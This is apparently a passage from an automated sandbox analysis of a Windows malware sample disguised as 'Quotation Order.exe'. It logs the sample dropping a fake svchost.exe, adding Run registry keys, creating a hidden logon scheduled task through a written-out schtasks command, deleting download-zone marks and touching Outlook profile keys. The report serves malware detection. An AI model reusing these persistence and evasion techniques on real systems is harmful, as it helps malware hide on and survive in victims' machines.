                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Users\user\Desktop\Quotation Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Quotation Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Quotation Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Core.pdbmscorlib.dllSystem.dll@ source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: AddInProcess32.pdbpw source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.pdb source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: mscorlib.pdb` source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: fic.pdbn source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb` source: WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbCon source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbH source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb#( source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbmeerCo source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb@ source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbpHj! source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: mscorlib.pdb" source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: AddInProcess32.pdb source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp, WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Object InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: caspol.pdb source: avdfUcC.exe.31.dr
                    Source: Binary string: System.Core.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Quotation Order.exeStatic PE information: 0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CD1BD push ecx; iretd 0_2_00007FF7C19CD35C
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C5165 push FFFFFF92h; ret 0_2_00007FF7C19C5176
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C1AA0002 push esp; retf 4810h0_2_00007FF7C1AA0312
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BD1BD push ecx; iretd 15_2_00007FF7C19BD35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B5165 push FFFFFF92h; ret 15_2_00007FF7C19B5176
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C1A9026B push esp; retf 4810h15_2_00007FF7C1A90312
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198D1BD push ecx; iretd 17_2_00007FF7C198D35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1985165 push FFFFFF92h; ret 17_2_00007FF7C1985176
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1A6026B push esp; retf 4810h17_2_00007FF7C1A60312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_06495BE0 push es; ret 26_2_06495BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_069A11B0 push es; ret 26_2_069A11C0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19AD1BD push ecx; iretd 38_2_00007FF7C19AD35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A5165 push FFFFFF92h; ret 38_2_00007FF7C19A5176
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C1A8026B push esp; retf 4810h38_2_00007FF7C1A80312
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191D1BD push ecx; iretd 52_2_00007FF7C191D35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1915165 push FFFFFF92h; ret 52_2_00007FF7C1915176
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19F026B push esp; retf 4810h52_2_00007FF7C19F0312

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\Desktop\Quotation Order.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avdfUcC
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Users\user\Desktop\Quotation Order.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avdfUcC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avdfUcC

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
